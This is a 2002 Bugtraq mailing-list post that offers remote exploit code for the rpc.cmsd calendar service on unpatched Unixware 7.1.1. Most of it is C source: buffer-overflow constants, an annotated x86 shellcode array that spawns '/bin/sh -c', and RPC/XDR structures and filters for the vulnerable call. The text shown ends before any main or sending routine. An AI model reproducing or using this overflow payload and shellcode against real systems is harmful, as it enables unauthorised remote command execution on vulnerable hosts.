Unixware 7.1.1 rpc.cmsd remote exploit code.
Date: 10 Jan 2002 04:40:54 -0000
From: "jGgM." <jggm@mail.com>
To: bugtraq@securityfocus.com
Subject: Unixware 7.1.1 rpc.cmsd remote exploit code.
Hi, I'm jGgM.
Here is the Unixware 7.1.1 rpc.cmsd remote exploit code.
This is an old bug (currently patched, maybe).
This works only on unpatched Unixware 7.1.1.
--------------------------------------
Korean security Info.. by jGgM.
http://www.forsecure.com/
http://www.netemperor.com/
--------------------------------------
/*
* Unixware 7.x rpc.cmsd exploit by jGgM
* http://www.netemperor.com/en/
* EMail: jggm@mail.com
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define BUFFER_SIZE 1036
#define SHELL_START 1024
#define RET_LENGTH 12
#define ADJUST 100
#define NOP 0x90
#define LEN 68
/*
 * Author's hard-coded machine-code byte string. The leading number on
 * each line is the byte offset of that fragment within the array, and
 * the trailing comment is the author's own annotation; both are kept
 * verbatim, only reflowed onto single lines.
 */
char shell[] =
/* 0 */  "\xeb\x3d"                         /* jmp springboard */
/* syscall: */
/* 2 */  "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0 */
/* 9 */  "\xc3"                             /* ret */
/* start: */
/* 10 */ "\x5e"                             /* popl %esi */
/* 11 */ "\x31\xc0"                         /* xor %eax,%eax */
/* 13 */ "\x89\x46\xbf"                     /* movl %eax,-0x41(%esi) */
/* 16 */ "\x88\x46\xc4"                     /* movb %al,-0x3c(%esi) */
/* 19 */ "\x89\x46\x0c"                     /* movl %eax,0xc(%esi) */
/* 22 */ "\x88\x46\x17"                     /* movb %al,0x17(%esi) */
/* 25 */ "\x88\x46\x1a"                     /* movb %al,0x1a(%esi) */
/* 28 */ "\x88\x46\xff"                     /* movb %al,0x??(%esi) */
/* execve: */
/* 31 */ "\x31\xc0"                         /* xor %eax,%eax */
/* 33 */ "\x50"                             /* pushl %eax */
/* 34 */ "\x56"                             /* pushl %esi */
/* 35 */ "\x8d\x5e\x10"                     /* leal 0x10(%esi),%ebx */
/* 38 */ "\x89\x1e"                         /* movl %ebx,(%esi) */
/* 40 */ "\x53"                             /* pushl %ebx */
/* 41 */ "\x8d\x5e\x18"                     /* leal 0x18(%esi),%ebx */
/* 44 */ "\x89\x5e\x04"                     /* movl %ebx,0x4(%esi) */
/* 47 */ "\x8d\x5e\x1b"                     /* leal 0x1b(%esi),%ebx */
/* 50 */ "\x89\x5e\x08"                     /* movl %ebx,0x8(%esi) */
/* 53 */ "\xb0\x3b"                         /* movb $0x3b,%al */
/* 55 */ "\xe8\xc6\xff\xff\xff"             /* call syscall */
/* 60 */ "\x83\xc4\x0c"                     /* addl $0xc,%esp */
/* springboard: */
/* 63 */ "\xe8\xc6\xff\xff\xff"             /* call start */
/* data: */
/* 68 */ "\xff\xff\xff\xff"                 /* DATA */
/* 72 */ "\xff\xff\xff\xff"                 /* DATA */
/* 76 */ "\xff\xff\xff\xff"                 /* DATA */
/* 80 */ "\xff\xff\xff\xff"                 /* DATA */
/* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */
/* 92 */ "\x2d\x63\xff";                    /* DATA */
/*
 * Request body for the RPC call: two XDR strings, serialised in order
 * by xdr_cm_send(). Both are plain C strings (xdr_wrapstring).
 */
struct cm_send {
char *s1; /* first string argument */
char *s2; /* second string argument */
};
/* Reply body: a single int, handled by xdr_cm_reply(). */
struct cm_reply {
int i; /* integer result returned by the server */
};
/*
 * XDR filter for struct cm_send: encodes or decodes s1 then s2 as
 * counted strings, in that order.
 *
 * @param xdrs  XDR stream (direction is taken from the stream).
 * @param objp  Record whose two string fields are (de)serialised.
 * @return TRUE on success, FALSE as soon as either field fails.
 *
 * Note: when decoding into a NULL string pointer, xdr_wrapstring
 * allocates the buffer; the caller is responsible for releasing it
 * (e.g. via xdr_free with this same filter).
 */
bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
	bool_t ok = xdr_wrapstring(xdrs, &objp->s1);

	/* Only touch the second field if the first one went through. */
	if (ok)
		ok = xdr_wrapstring(xdrs, &objp->s2);

	return ok ? TRUE : FALSE;
}
/*
 * XDR filter for struct cm_reply: a single int.
 *
 * @param xdrs  XDR stream (direction is taken from the stream).
 * @param objp  Record whose int field is (de)serialised.
 * @return TRUE if xdr_int succeeded, FALSE otherwise.
 */
bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
	/* Normalise xdr_int's result to the TRUE/FALSE constants. */
	return xdr_int(xdrs, &objp->i) ? TRUE : FALSE;
}